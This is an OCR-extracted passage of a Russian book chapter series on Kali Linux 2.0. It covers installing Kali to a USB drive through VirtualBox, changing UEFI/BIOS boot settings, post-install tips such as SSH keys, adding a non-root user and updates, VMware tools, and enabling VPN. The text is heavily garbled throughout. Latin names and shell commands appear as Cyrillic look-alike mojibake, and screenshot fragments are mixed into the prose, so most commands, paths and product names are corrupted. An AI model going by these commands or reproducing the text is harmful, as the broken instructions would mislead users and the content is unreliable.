Процедура установки на флэшку и на идентична. Разница только в том, что на жёстком 
диске можно создать несколько разделов (дисков). Конечно, на флешке тоже можно 
создать несколько разделов, но заставить ѴѴіпсІоѵѵз увидеть все их — это 
нетривиальная задача. Если у вас всё в порядке с деньгами, то посмотрите на внешние 
твердотельные диски (). У них небольшой физический размер (немногим больше 
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флешек), они очень ёмкие (у них большой объём памяти) и они, естественно, очень 
быстрые. И, как было сказано чуть ранее, их можно разделить на разделы. 

Вообще, на ѴѴеЬѴѴаге.Ыг уже есть статья « Установка Каіі Ыпих І_іѵе на 115В ». Ключевое 
слово в ней — Ыѵе. Т.е. мы попросту делаем загрузочную флешку с 1_іѵе версией. 
Особенностью Ыѵе версии является то, что невозможно сохранить изменения. Т.е. все 
сделанные изменения будут теряться при последующей перезагрузке. 

Как сделать так, чтобы появилась возможность сохранять изменения, рассказано в 
статье « Добавление возможности постоянного сохранения (РегБІзіепсе) к вашим Каіі 

1_іѵе Ц5В ». Описанную в ней процедуру нужно выполнять под Ыпих, что для некоторых 
может показаться слишком сложным. 

А для совсем продвинутых, есть ещё одна статья « Каіі 115В - хранилище с мульти 
профилями ». 

Способ, на который выше даны ссылки, является рекомендуемым авторами Каіі 1_іпих и 
является универсальным. 

Предложенный ниже способ — является очень простым, но чуть менее 
универсальным. На некоторых компьютерах, процессор которых не поддерживает 
виртуализацию, применить инструкцию не получится. 

На самом деле, нижеприведённая инструкция применима к любому Ыпих! Т.е. если вы 
хотите установить Міпі, ІІЬипІи или любой другой дистрибутив на флеш-накопитель, 
то эта инструкция поможет вам. 

Инструкция по установке Ыпих на ІІ5В-флеш-накопитель или на внешний 
жёсткий диск 


Нам понадобится программа Ѵі гТиаIВох . Это программа для создания виртуальных 
компьютеров. Наш установленный на флешку Ыпих будет работать не в виртуальной 
машине, никакие виртуальные компьютеры будут не нужны. Но, для установки, один 
раз нам понадобится эта программа. Скачиваем, устанавливаем, запускаем ѴігіиаІВох. 


Создаём новую машину с любым именем — она нам понадобится на один раз. Там, где 
тип, выберите І.іпих. А там, где версия, выберите что угодно, например, ОеЬіап (64 ЫТ). 
Если у вас нет 64-битных опций, значит процессор не поддерживает такую 
виртуализацию — с этим ничего нельзя поделать. 



Объём оперативной памяти тоже не очень важен. Поставьте, например, 1 Гб. 
Выберите опцию «Не подключать жёсткий диск» — это важно для нашей установки. 
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Создать виртуальную машину 


Выберите жёсткий диск 


При желании к новой виртуальной машине можно подключить виртуальный 
жёсткий диск. Вы можете создать новый или выбрать из уже имеющихся. 

Если Вам необходима более сложная конфигурация Вы можете пропустить 
этот шаг и внести изменения в настройки машины после её создания. 

Рекомендуемый объём нового виртуального жёсткого диска равен 8,00 ГБ. 

• ' Не подключать виртуальный жёсткий диск 

О Создать новый виртуальный жёсткий диск 

) Использовать существующий виртуальный жёсткий диск 

СепЮЗ.ѵй (Обычный, 100,00 ГБ) - 0 


V- 


Создать 


Отмена 


Нажимаем «Создать», появится предупреждение: 


'і' ѴігіиаІВох - Предупрежде... ? 


Вы собираетесь создать новую 
|л виртуальную машину без привода жёсткого 
диска. У Вас не будет возможности 
установить операционную систему до тех 
пор, пока Вы не добавите как минимум один 
жёсткий диск. Однако, Вы сможете 
запустить машину и загрузить 
операционную систему с оптического 
диска. 


х 


Продолжить 


Назад 


Всё правильно — именно это нам и нужно, нажимаем «Продолжить». 

Теперь запускаем нашу новую виртуальную машину. Нас просят выбрать диск для 
установки. Бесплатно скачать Каіі Ыпих можно на официальном сайте . Выберите 
желаемую битность и используйте торрент, пожалейте их сервера! 
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т 


{етр [Выключена] - Огасіе ѴМ ѴігТиаІВох 



Машина Вид Устройства Справка 



Выберите загрузочный диск 



& Ш Щ ВідЫ СбгІ 


Выбираем скаченный образ. Каіі Ыпих загрузится в следующее меню: 
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Ничего пока не трогаем, а вставляем нашу флешку в компьютер (в реальный 
компьютер). И вот здесь у меня возникла заминка. Дело в том, что Каіі Ыпих не видела 
флешку. Я подумал, что просто не произошло автоматическое монтирование и ввёл 
команды для этого. Но оказалось, что монтировать нечего — в списке устройств 115В- 
накопитель (да и вообще любые диски) отсутствовали. Я даже проверил с другим 
Линуксом — Ыпих МіпТ. Результат оказался тем же: виртуальный компьютер не видел 
флешку, хотя ѴігІиаІВох захватывал её. Т.е. флешка становилась недоступной для 
использования на реальной машине. Решение оказалось очень простым: переткнуть 
флешку из гнезда 115В 3 в гнездо 115В 2. Новая бета версия ѴігІиаІВох 5 поддерживает 
115В 3 (если установить пакет расширений). Но у нас стабильная версия, поэтому просто 
смиряемся с более медленной работой флешки при установке операционной системы. 

Флешку не нужно подготавливать (делать загрузочной или что-то такое) — Ыпих сам 
всё сделает и правильно настроит. Данные с флешки удалятся — думаю, вы это 
понимаете. Т.е. если там что-то ценное, то заранее скопируйте их куда-нибудь. 

В общем, после подключения флешки к реальному компьютеру, теперь нужно её 
подключить к виртуальной машине, это делается в этом меню: 


ЁВ 


Іетр [Работает) - Огасіе ѴМ ѴігТиаІВох 


Устройства Справка 


© Приводы оптических дисков 


Устройства Ц5В 
Общий буфер обмена 


[§] Ргад'п'Огор 
(■р) Сеть 

СЩ Настроить общие папки... 

ЦЛ Учаленный доступ 

ИЗ Захват видео 

(Р Подключить образ диска Дополнений гостевой ОС... 


1 одіІесЬ 0700 І 35ег Мойве [6502] 


Т05НІВА Ц5В ЭКѴ [0100] 


МСМЕХ5С-2»НИ1НШ[00221 Л0ОТ1Щ «,* 0930 

Неизвестное устройство 8087:070А [7869 Ю продукта: 1400 


Ревизия: 0100 
Серийный № 0708510060ЮОР76 
Состояние: Занято 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Теперь возвращаемся к нашей Каіі и выбираем там «СгарНісаІ іпзіаІІ». 


шшл 



Вооі те пи 



Ьіое (атД64) 

Ьіое (атс164 ГаіІзаГе) 

ІЛие (Гогепзіс тогіе) 

Ьіое 115В Регзізіепсе 

Ьіѵе 118В ЕпсгуріеЛ Регзізіепсе 
Іпзіаі1 

(сііеск 

(сЬеск 

каіі.огд/ргзі) 
каіі.огд/ргзі) 

бгарііісаі іпзіаіі 

Іпзіаіі иіііі зреесіі зупіііезіз 
АгіиапсеЛ орііопз 


> 



Дальше всё просто. Здесь не все скриншоты, только несколько узловых. Если у вас 
трудности именно на этом этапе, то можете подсмотреть подсказки в статье про 
установку Каіі . 


кшо ши® 


Беіесі а Іапдиаде 


СНоо$е 1Не Іапдиаде Іо Ье изесі ТогіЬе іп^іаііаііоп ргосе55. ТЬе веіесіегі Іапдиаде ѵѵіІІ аізо Ье 1Не 
гіе^аиіі Іапдиаде ^огіЬе іпъіаііесі $у8іет. 

іапдиаде: 


Иогѵуедіап Мупогзк 

Регзіап 

РоіібЬ 

Рогіидиезе 

Рогѣидиеве (ВгагіІ) 

РипіаЬі (СигтикЫ) 

Вотапіап 

Могзк пупогзк 

■ 

Роівкі 

- Рогіидиё? 

Рогіидиёз сіо Вга^іі 

- 

Вотапа 

/==; 

Ви$$іап 

Русский 


БегЬіап (СугіІІіс) 

Српски 


ЗіпНаІа 



БІоѵак 

ЗІоѵепсіпа 


БІоѵепіап 

§Іоѵеп5сіпа 


5рапі$Ь 

Е^рапоІ 

_ 

БѵѵегііъЬ 

Бѵепзка 


Тадаіод 

Тадаіод 

- 


5сгееп$Ьо( Со Васк | Сопііпие | 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


КШО йОЮШИ 


5еІесТ а Іапдиаде 


Перевод программы установки на выбранный язык не завершён. 

Вероятность того, что вы встретите непереведённый диалог на выбранный язык чрезвычайно мала, но 
не исключается полностью. 

Продолжить установку на выбранном языке? 

О Нет 
® ;Да 


Снимок экрана 


Вернуться 


Продолжить 


\шш шиши 


Разметка дисков 

Программа установки может провести вас через процесс разметки диска (предлагая разные 
стандартные схемы) на разделы, либо это можно сделать вручную. Если выбрать использование 
инструмента управления разметкой, у вас всё равно будет возможность позже посмотреть и 
подправить результат. 

Если выбрать использование инструмента управления разметкой всего диска, то далее вас попросят 
указать нужный диск. 

Метод разметки: 



Снимок экрана 


Вернуться 


Продолжить 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


кшо ошва 


Разметка дисков 


Заметим, что все данные на выбранном диске будут стёрты, но не ранее чем вы подтвердите, что 
действительно хотите сделать изменения. 

Выберите диск для разметки: 


5С5І4 (0,0,0) (5<1а) - 15.8 СВ Т05НІВА Т05НІВА 115В ОВѴ 


Снимок экрана 


Вернуться 


Продолжить 


кшо шши 


Разметка дисков 
Выбрано для разметки: 

5С5І4 (0,0,0) (5<іа) - Т05НІВА Т05НІВА 115В ОКѴ: 15.8 СВ 

Диск может быть размечен по одной из следующих схем. Если вы не знаете, что выбрать — выбирайте 
первую схему. 

Схема разметки: 



Снимок экрана 


Вернуться 


Продолжить 
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кшо еоишез 


Разметка дисков 

Перед вами список настроенных разделов и их точек монтирования. Выберите раздел, чтобы изменить его 
настройки (тип файловой системы, точку монтирования и так далее), свободное место, чтобы создать новый 
раздел, или устройство, чтобы создать на нём новую таблицу разделов. 

Автоматическая разметка 

Настройка программного КАЮ 

Настройка менеджера логических томов (И/М) 

Настроить шифрование для томов 

^ 5С5І4 (0,0,0) (5ба) - 15.8 СВ ТОБНІВА Т05НІВА 115В ЭКѴ 

> #1 первичн. 15.1 СВ Е ех!4 / 

> #5 логичес. 694.2 МВ Р подк подк 

Отменить изменения разделов 


Закончить разметку и записать изменения на диск 


Снимок экрана 


Справка 


Вернуться 


Продолжить 


ЕШО ШИШЕ 


Разметка дисков 


Если вы продолжите, то изменения, перечисленные ниже, будут записаны на диски. Или же вы можете 
сделать все изменения вручную. 

ВНИМАНИЕ: Эта операция уничтожит все данные на удаляемых разделах, а также на тех разделах, на 
которых должна быть создана новая файловая система. 

На этих устройствах изменены таблицы разделов: 

5С5І4 (0,0,0) (5<)а) 

Следующие разделы будут отформатированы: 
раздел #1 на устройстве 5С5І4 (0,0,0) (зсіа) как ех!4 
раздел #5 на устройстве 5С5І4 (0,0,0) (згіа) как подк 

Записать изменения на диск? 

О Нет 
@ (Да 


Снимок экрана 


Продолжить 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


А теперь просто ждём. Хоть я специально купил флешку с поддержкой 115В 3, нам не 
удалось воспользоваться преимуществом в скорости. 


каш вяаш 


Установка системы 


Установка системы... 


Копирование данных на диск... 


ЕШО ШИШИ 


Настройка менеджера пакетов 

Зеркало архива из сети может использоваться в дополнении к ПО уже включённому на компакт-диски. 
Также оно может содержать более новые версии ПО. 

Использовать зеркало архива из сети? 

О Нет 

®:ді 


Снимок экрана 


Вернуться 


Продолжить 
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ЕШО ШИШ 


Установка системного загрузчика СРШВ на жёсткий диск 


Похоже, что данная система будет единственной на этом компьютере. Если это действительно так, то 
можно спокойно устанавливать системный загрузчик СКІІВ в основную загрузочную запись первого 
жесткого диска. 

Внимание! Если программе установки не удалось обнаружить другую операционную систему, 
имеющуюся на компьютере, то изменение основной загрузочной записи приведёт к тому, что эту 
операционную систему некоторое время нельзя будет загрузить. Позднее можно будет настроить 
СРШВ для её загрузки. 

Установить системный загрузчик СР.ІІВ в главную загрузочную запись? 

О Нет 

® Ій 


Снимок экрана 


Вернуться 


Продолжить 


Наконец-то всё готово: 


калл шиши 


Завершение установки 



Установка завершена 

Установка завершена, пришло время загрузить вашу новую систему. Убедитесь, что носители, 
с которых производилась установка (компакт-диски, гибкие диски), извлечены, чтобы система 
загрузилась с диска, на который производилась установка. 


Снимок экрана 


Вернуться 


Продолжить 
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Перезагрузка начнётся не сразу — дожидаемся окончание всех операций. Когда 
мелькнёт чёрный экран, то можно отключить виртуальную машину. 

Вот и всё — флешка готова. Теперь можно загрузится с неё на любом компьютере. 

Загрузка Каіі Ыпих с флешки 

Если у вас ѴѴіпсіохл/5 не лицензионный, а «обычный», то загрузится с флешки достаточно 
просто. При начале загрузки компьютера нажимайте много раз кнопку Эеіеіе или Езс 
(иногда другую — в зависимости от модели материнской платы — это можно узнать у 
Гугла). В БИОСе, там где «Порядок загрузки» выберите вашу флешку. Флешка в этот 
момент должна быть вставлена в компьютер, иначе БИОС её не увидит. Опять же, 
когда я использовал гнездо 115В 3, то и БИОС не видел флешку. Пришлось переключить 
в 115В 2. 


Если у вас лицензионный ѴѴіпсІоѵѵз (мне его втюхали вместе с ноутом), то у вас 
наверняка стоит новый геморрой от Місгозоіі: под названием ИЕЕІ. Благодаря этой 
новации, теперь просто так не попадёшь в БИОС (а что это меняет, кроме добавления 
проблем?). 


Самый простой способ попасть в БИОС — это ввести в командной строке (от имени 
администратора): 


зЬиІісІоѵѵп.ехе /г /о 


После этого появится сообщение, что компьютер перезагрузится менее чем через одну 
минуту. После перезагрузки попадаем сюда и выбираем «Диагностика»: 


Выбор действия 



Продолжить 


Выход и использование ѴѴіпсІоѵѵз 8.1 



Диагностика 


Восстановление компьютера, 
возврат компьютера в исходное 
состояние или использование 
дополнительных средств 


(!) 


Выключить 
. компьютер 
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Теперь выбираем «Дополнительные параметры»: 


Ѳ Диагностика 

Восстановить 

Если ваш компьютер работает 
неправильно, вы можете его 
восстановить без потери файлов 

Вернуть в исходное 
состояние 

Ваши файлы будут удалены 


Дополнительные 

параметры 

ѵ !| й Ь Д Д 

Г, И 1 - [иі, 'Р- Ш 1Р® 1 ' 



Теперь «Параметры встроенного ПО ІІЕРІ»: 


© Дополнительные параметры 



Восстановление 

системы 

Восстановление ѴѴіпс1о\ѵ5 с помощью 
точки восстановления 

ИЗ 





Восстановление 
образа системы 

Восстановление УЛпсІоѵѵз с помощью 
файла образа системы 

Щ 




<о> 

Восстановление при 
загрузке 

Устранение неполадок, мешающих 
загрузке ѴѴіп(1оѵѵ5 

О 


Командная строка 

Командную строку можно применять 
для расширенного устранения 
неполадок 


Параметры 
встроенного ПО 
ІІЕРІ 


Параметры загрузки 

Настройка параметров загрузки 

ШІПСІОѴѴ5 
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Ну и «Перезагрузить»: 


© Параметры встроенного ПО ІІЕРІ 

Перезагрузитесь для изменения параметров встроенного ПО 
ІІЕРІ 









У разных производителей разные БИОСы, поэтому у вас может быть по-другому. Но я 
покажу на пример своего ноута, чтобы была понятна суть. Переходим во вкладку Вооі, 
там выбираем Вооі Орііоп Ргіогіііез, смотрим какие там есть варианты: 


5ЙМ81ІЫВ В103 СопІ іёигаТ іоп 



- соругігм (С) 2013 нтепсап Мегатегн* тс 
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Всего один вариант и точно нет моей флешки. 


Ищем 5есиге Вооі и отключаем (ОізаЫе): 



Появляется новый пункт меню 05 Мосіе Зеіесііоп. В нём выбираем СМ5 апсі ІІЕРІ 05. 
Если выбрать только СМ5 05, то установленный ѴѴіпсІоѵѵз не будет загружаться. 
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Теперь ищем такой пункт как Разі ВІ05 Мосіе и отключаем его (ОізаЫе). Это нужно для 
того, чтобы при загрузке БИОС начал проверять наличие 115В устройств: 


Раз! ВІОЗ Мосіе 


йНСІ Мосіе СопТгоІ 

ВаТТегу БіТе Сусіе ЕхТепзіоп 
115В СЬагёе Іп Зіеер Мосіе 
СІЗВ 33 Наке-ир 

РигсНазесІ ЭаТе 



Настало время сохранить изменения и перезагрузится: 


Заѵе СИапёез апсі Везет 


І ы ііьоі и аі іи ксьсі 

ВезТоге ОеТаиІТз 
Оізсагсі СИап^ез 
Заѵе СІіапёез 


ВооТ ОѵеггіУе 

Ніпсіошз ВооТ Мапаёег (Р0: ЗАМЗУМС М27РС128Н 
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Но нам опять нужно в БИОС! Поэтому при загрузке нажимаете соответствующую 
клавишу. У меня эта клавиша — Р2. На старом компьютере этой клавишей была Оеіеіе. 
Эту клавишу БИОС сам пишет при загрузке компьютера. Если вы не успеваете 
посмотреть или не понимаете английский, то посмотрите для вашей модели в Гугле. 
Либо пробуйте методом перебора. Кроме названных, ещё этой клавишей может быть 
Езс или какая либо Г*. 

Опять переходите во кладку Вооі Орііоп Ргіогіііез. Теперь там появилась флешка. Если 
вы сделаете как я — на первое место поставите флешку, а на второе — ѴѴіпсІо\л/$ Вооі 
Мапа§ег, то добьётесь следующего эффекта: если флешка вставлена в компьютер, то 
будет загружаться Ыпих с этой флешки. Если флешки нет, то будет загружаться \Л/іпсІо\л/5 
и не надо больше лазить в БИОС! 


ВооТ ОрТіоп #1 


ВооТ ОрТІОп #3 
ВООТ ОрТІОП #4 


[РЗ: НіТасБі НТ3727575А9Е364] 


іпсіоо 

[Р2: ТЗЗТсогр ОѴОІ 
[ТОЗНІВА ТОЗНІВА 115В ОРѴ 


- воот оргіоп #1 - 

Ніпсіошз Воог Мапагег (РО: ЗАМЗІІне М27РС128НАР0-000) 

РЗ: НІТасЬІ НТ3727575А9Е364 

Р2: ТЗЗТсогр РѴОИВО ЗЫ-406АВ 

ТОЗНІВА ТОЗНІВА ЫЗВ РРѴ РМАР 

оізаЫес! 


Р5 

: Оеѵісе 

Р6 

: Оеѵісе 

Р9 

: ОрТіглі 

РІО 

: Заѵе а 

ЕЗС 

: ЕхіТ 


Аргіо зегир ІЭТІИТу - соругігиг (С) 2013 Атегісап мегаХгепб< 
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Не забываем сохранится и перезагружаемся: 



61411 6Р1ЛЗ ѵегзіогГ 


Цзе ТНе ♦ апсі * кеуз То зеіест шбісб епТгу із ЬівІзІівИТесІ. 
Ргізз ептег То ЬооТ ТМе зеІесТес» 05, 'е' То есІІТ ТИе соттапсіз 

ЬеТоге ЬооТіпв ог ’с’ Тог а соттапсі Ііпе. 


Заключение 


Установка на флешку с использованием ѴігТиаІВох - это не единственный способ. Я 
видел в Интернете инструкцию в соответствии с которой рекомендовалось записать 
Ыѵе-образ Ыпих на СЭ (ОѴО)-диск, загрузится с него, вставить флешку и произвести 
установку на флешку. Недостатки данного способоа: 

• обязательно нужен СО (ОѴО)-привод (уже не у всех он есть); 

• есть вероятность напортачить. В качестве возможных последствий могут быть 
как безобидные (невозможность загрузиться в установленный Ыпих на других 
компьютерах), так и вполне серьёзные (случайное удаление всех данных с 
одного из жёстких дисков). 

Если ваш процессор не поддерживает виртуализацию, т. е. вы не можете использовать 
ѴігІиаІВох, то действуйте как написано в инструкциях: 

• Установка КаІІ Ыпих І_іѵе на 115В 

• Добавление возможности постоянного сохранения (Регзізіепсе) к вашим КаІі І_іѵе 

Ц$В 

Если у вас ещё нет флешки или вы хотите приобрести новую специальной для КаІі, то 
необходима флешка размером от 16 Гигабайт. Я рекомендую 32 Гигабайта — 
поскольку у меня постоянно появляются сообщения, что заканчивается свободное 
место, лучше брать быструю — чем быстрее, тем лучше. Самые дешёвые цены на 
еВау.сот . 
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Глава 5.10 лучших подсказок того, что нужно сделать 

после установки Каіі Ыпих 2.0 

Источник: НіірзУ/ѵѵѵѵѵѵ.о^епзіѵе-зесипіѵ.сот/каІі-Ііпих/іор-ІО-рові-іпзіаІІ-іірз/ 

С выходом Каіі 2.0 мы хотим поделиться несколькими статьями о послеустановочных 
процедурах, которые мы сами повторяем снова и снова, надеемся, что они окажутся 
для вас полезными. Мы также здесь отвечаем на некоторые популярные вопросы, 
которые к нам приходят, здесь наш список из 10 первых подсказок: 

Включение или отключение интеллектуальных опций боковой панели 

Некоторым людям это нравиться, некоторые ненавидят это. На маленьких 
разрешениях это может быть раздражающим. Мы говорим об исчезновении боковой 
панели с левой стороны экрана. Вот короткое видео, как изменить её поведение. 

бНр5://\м\м\м.уоиіиЬе.сот/ѵѵа1:сІі?ѵ=сІгА(ЭѴРХиХи4 

Добавьте ваш публичный ключ 55Н в Каіі 2.0 

Каіі Ыпих 2.0 перенимает из ЭеЬіап дефолтные опции настройки 55Н, которые 
отключают возможность входа для гооі: без кеу (так по умолчанию начиная с .Іеззіе). 


1| 

гоо1:@каІІ:~# §гер Вооі: /еЩ/ззІі/ззЬсІ-СОпбё 

21 

РегтіШоо1:І-0§іп ѵѵібіоЩ-раззѵѵогсІ 


Менее предпочитаемая альтернатива — это поменять параметр РегтііКооНодіп на 
"уез" и перезапустить сервер 55Н, который позволит удалённый вход для рута без 
пароля. Для безопасного входа рута по 55Н лучше добавьте ваш публичный ключ в 
файл аиіНогігесНсеуз. 

Установка драйверов ІЧѵісІіа если они вам нужны 

Если у вас графическая карта ІМѴЮІА, вам следует воспользоваться этой инструкцией по 
установлению ІМѴЮІА драйверов в Каіі 2.0. 

Установите гостевые инструменты ѴМѴУаге или ѴігІиаІЬох, если в них 
есть необходимость 

Наши инструкции по установке виртуальных гостевых инструментов не сильно 
изменились и прекрасно работают на последних версиях ѴМѴУаге (ѴѴогкзТаТіоп и 
Ризіоп), а также на ѴігІиаІВох . 

Отключение функции Споте по блокировке экрана 

Мы забыли отключить эту функции в наших официальных сборках, но мы это сделаем в 
наших предстоящих обновлениях и будущих выпусков 150. Это самый быстрый способ 
отключения функции экрана блокировки Споте: 

бНрз://\м\м\м.уои1:иЬе.сот/\л/а1:сІі?ѵ=.Іи9дсІУСс9гк 

Не добавляйте дополнительные репозитории в вашу Каіі 2.0 

Если по каким-то причинам вы выбрали «нет», когда вас спрашивали «использовать 
сетевое зеркало» во время установки Каіі, в вашем файле зоигсез.іізі могут 
отсутствовать некоторые пункты. Если это ваш случай, проверьте список официальных 
репозиториев, которые должны быть в этом файле. Чтобы там не говорилось во многих 
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неофициальных инструкциях, избегайте добавления дополнительных репозиториев в 
ваш файл зоигсеБ.МзТ. Не добавляйте каіі-сіеѵ, каІі-гоІІіп§ или какие-либо другие 
репозитории Каіі, если на то нет особой причины — а обычно её нет. Если вы 
*должны* добавить дополнительные репозитории, бросьте их лучше в новый файл 
источников /еіс/арі/зоигсез.іізі.сі/ вместо этого. 

Добавление пользователей не-рутов, если вам неудобно работать как 
гооі 

Мы видим, что многих пользователей утомляет использование Каіі тот факт, что 
главным пользователем ОС является гооі. Это вызывает у нас недоумение, ведь 
добавление не-рут пользователей в Каіі тривиально, и может быть выполнено набором 
команд вроде следующих (просто измените «тіаі» на ваше собственное имя 
пользователя): 


1| 

гоо1:@каІІ:~# изегасісі -т тіаі -6 зисіо -5 /Ып/ЬазН 

21 

гоо1:@каМ:~# раззѵѵсі тіаі 

3| 

ЕЩег пеѵѵ ІІІМІХ раззѵѵогсі: 

4| 

Кеіуре пеѵѵ ІІІМІХ раззѵѵогсі: 

51 

раззѵѵсі: раззѵѵогсі ирсІаТесІ зиссеззРиІІу 

6| 

гоо1:(а)каІІ:~# 


Избегайте установку РІазН плеера 

Просто не надо. 


Поддерживайте систему Каіі обновлённой 


Мы подтягиваем обновления от ОеЬіап 4 раза в день. Это гарантирует, что обновления 
безопасности реализованы в Каіі на постоянной основе. Вам следует поддерживать 
свою систему в обновлённом состоянии, регулярно выполняя следующие команды: 


1 


арІ-§е1: ирсіаіе && арІ-§е1: сНзІ-ир^гасіе 


Избегайте устанавливать инструменты в определённые директории РН5 

Есть несколько способов использовать Каіі — либо как «машина для тестирования на 
выброс», либо «долгое использование ОС». Метод «на выброс» влечёт настройку Каіі 
для короткого времени использования, а затем «убивания» ОС, когда всё выполнено 
(так обычно делают в виртуальном окружении). «Долговременное использование» 
можно описать как использование Каіі на ежедневной постоянной основе. Оба методы 
совершенно нормальные, но требуют различного обращения. Если вы планируете 
использовать Каіі на повседневной основе, вам следует избегать установки программ в 
заданные директории РН5, т. к. это может конфликтовать с уже существующими и 
вызовет проблемы у пакетного менеджера арі. 
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Глава 6. Инструменты ѴМѵѵаге в гостевой системе Каіі 
(обновлённая инструкция для Каіі Ыпих 1.1.0 и Каіі Ыпих 2.0) 


Если вы не захотите использовать наши предварительно созданные образы ѴМѵѵаге, а 
решите создать вашу собственную установку ѴМѵѵаге, то вам понадобиться 
нижеследующая инструкция для успешной установки инструментов ѴМѵѵаге в вашу 
инсталяцию Каіі. Вы можете воспользоваться орі: для установки или ореп-ѵт-ІооІЬох, 
или родных инструментов ѴМѵѵаге. 


Установка ореп-ѵш-іооіз 


Это, пожалуй, самый простой способ получить функциональность инструментов 
ѴМѵѵаге внутри гостевой машины Каіі ѴМѵѵаге. 


1 


арІ-§е1: іпзТаІ I ореп-ѵт-1:ооІЬох 


Установка инструментов ѴМѵѵаге в Каіі 

Последняя версия на эту дату ѵтѵѵаге-іооіз компилируется на наше ядро, хотя и с 
несколькими предупреждениями. Мы используем набор патчей ѵтѵѵаге-іооі для 
облегчения установки. 


1| 

ссі ~ 

21 

арТ-§е1: іпзТаІ 1 §І1: §сс таке Ііпих-1іеасіег5-$(ипате -г) 

3| 

ёіТ сіопе ЬіТр5://§і{ЬиЬ.сот/га5а/ѵтѵѵаге-ЩоІ5-раЩІіе5.§і1: 

4| 

ссі ѵтѵѵаге-ІхюІз-раІхНез 


Далее смонтируйте 150 с инструментами ѴМѵѵаге, кликнув "ІпзіаІІ ѴМѵѵаге Тооіз" 
(установить инструменты ѴМѵѵаге) из соответствующего меню. Как только 150 с 
инструментами ѴМѵѵаге подсоединится к виртуальной машине, скопируйте установщик 
в директорию загрузки, а затем запустите установочный скрипт: 


1| 

ссі ~/ѵтѵѵаге-1:ооІ5-ра1:сІіе5 

2 1 

ср /тесІіа/ссІгот/ѴМѵѵагеТооІ5-9.9.0-2304977. Таг . §2 сіоѵѵпіоасіз/ 

3| 

./ипіаг-апсІ-раІісН-апсІ-сотріІе.зН 


Глава 7. Как включить ѴРІЧ на Каіі Ыпих — разрешение 
проблемы с невозможностью добавить ѴРІЧ 
(для Каіі 2.0 и Каіі 1.x) 

Как устранить проблему с невозможностью добавить ѴРІЧ — включение 
ѴРІЧ на Каіі Ыпих 

Виртуальная частная сеть (ѴРІЧ) расширяет частную сеть через общедоступную сеть, 
такую как Интернет. Она позволяет компьютерам отправлять и получать данные через 
общие или публичные сети так, будто бы компьютер напрямую подсоединён к частной 
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сети, при этом используются все преимущества функциональности, безопасности и 
управление политиками частной сети. ѴРІМ создана для установления виртуального 
соединения между узлами с использованием выделенных соединений, виртуальных 
туннельных протоколов или шифрование трафика. На Каіі Ыпих, по умолчанию, опция 
ѴРІМ является неактивной, т. е. недоступной для добавления новых соединений. Эта 
инструкция покажет пользователям, как установить необходимые пакеты для 
разрешения проблемы с невозможностью добавить VРN и включением VРN на Каіі 
Ыпих. 


Несмотря на то, что коммуникации осуществляются по сетям с меньшим или 
неизвестным уровнем доверия (например, по публичным сетям), уровень доверия к 
построенной логической сети не зависит от уровня доверия к базовым сетям благодаря 
использованию средств криптографии (шифрования, аутентификации, инфраструктуры 
открытых ключей, средств для защиты от повторов и изменений передаваемых по 
логической сети сообщений). Вики . 

ѴРІМ позволяет работникам безопасно подключаться к внутренней сети компании при 
путешествии вне офиса. Точно также множество ѴРІМ связывает географически 
разрозненные офисы организации, создавая одну сплочённую сеть. Технология ѴРІМ 
также используется юзерами Интернета для подключения к прокси-серверам с целью 
защиты анонимности и местонахождения. 


Для чего использовать ѴРІЧ — какие преимущества? 

Здесь 11 главных причин, почему вас может заинтересовать использование служб ѴРІМ. 

1. ѴРІМ обеспечивает конфиденциальность и скрывает ваш ІР адрес. 

2. Использование любой сети (публичной или частной или бесплатного ѴѴІРІ) с 
шифрованием 

3. Конфиденциально заходите на вашу домашнюю или рабочую сеть из любого места. 

4. Обходите цензуру и мониторинг контента. 

5. Обход межсетевого экрана и политики цензуры на работе или где угодно! 

6. Доступ к ограниченным по регионам службам откуда угодно (видео ѴоиІхіЬе, ІМеІРІіх 
или ВВС РІауег и т.д.) 

7. Пересылайте или получайте файлы конфиденциально. 

8. Спрячьте ваши голосовые/ѴОІР звонки. 

9. Используйте поисковые системы, скрывая свои некоторые идентификаторы. 

10. Спрячьте себя. 

11. Потому что вам нравится анонимность. 

Как вы могли заметить из списка выше, ѴРІМ не обязательно прячет всё. Поисковые 
движки могут, возможно, всё ещё узнать вас, основываясь на ваших кукиз, 
предыдущем поведении браузера, входа в аккаунт (да уж!), плагинах браузера 
(например, АІеха, 0оо§1е ТооІЬаг и т. д.). 


Включение ѴРІЧ на Каіі Ыпих 2.0 


і 


арбШсІе -г іпБІаІІ пе1:\л/огк-тапа§ег-орепѵрп-§поте пеіѵѵогк-тапаёег-ррір пебл/огк- 
тапа§ег-рр1:р-§поте $1:гоп§5\л/ап-пт пеЦл/огк-тапа§ег-ѵрпс пебл/огк-тапа§ег-ѵрпс- 
§поте 
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Теперь выберите «Параметры проводных соединений»: 


И * 


еп / 


У «>)) 


/У ѴѴігесі Подключено ▼ 

Соединиться 

Параметры проводных соединений 

Э - Прокси Нет ► 

С* Батарея Полностью заряжена ► 


I 


% 
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Нажмите на плюсик (+) в нижем левом углу: 


Выберите ѴРМ 
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Вы увидите список доступных вариантов: 


Добавить сетевое подключение 


Сізео-совместимая ѴРІМ (ѵрпс) 

Совместим с различными ѴРІЧ-шлюзами Сібсо. .Іипірег. Меіхсгееп и Бопісѵѵаіі на основе ІРзес. 


ОрепѴРІМ 

Совместим с сервером ОрепѴРІМ. 


РоіпТ-Іо-РоіпТ Типпеііпд Ргоіосоі (РРТР) 

Совместим с серверами Місго$оД и другими серверами РРТРѴРІМ. 


Импортировать из файла... 

Отменить 


Включение ѴРІМ на Каіі Ыпих 1.x 
Проблема неактивности ѴРІМ на Каіі Ыпих 1.x 

По умолчанию, в Каіі Ыпих секция ѴРІМ серого цвета. На самом деле, разрешить эту 
проблему просто, но те, кто не знаком с пакетами, требуемыми для ѴРІМ, могут прийти 
в замешательство из-за большого количества веб-сайтов, дающих различные советы. 
Всё это приводим к тому, что может быть непросто выявить корректную информацию. 
Я постараюсь сделать простую и краткую инструкцию с объяснением того, что мы 
делаем. 



Ниже показан скриншот, на котором кнопка «Добавить» недоступна для 
использования. 
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Сетевые соединения 


Проводные ір Беспроводные № Мобильные ' (9 ѴРІМ ^ 051. 


Название 


Последнее подключение < 


Добавит! 


Изменить. 


Удалить.. 


Импортировать 


жспортировать 


Закрыть 


Инструкция по включению ѴРМ на Каіі Ыпих 1.x 

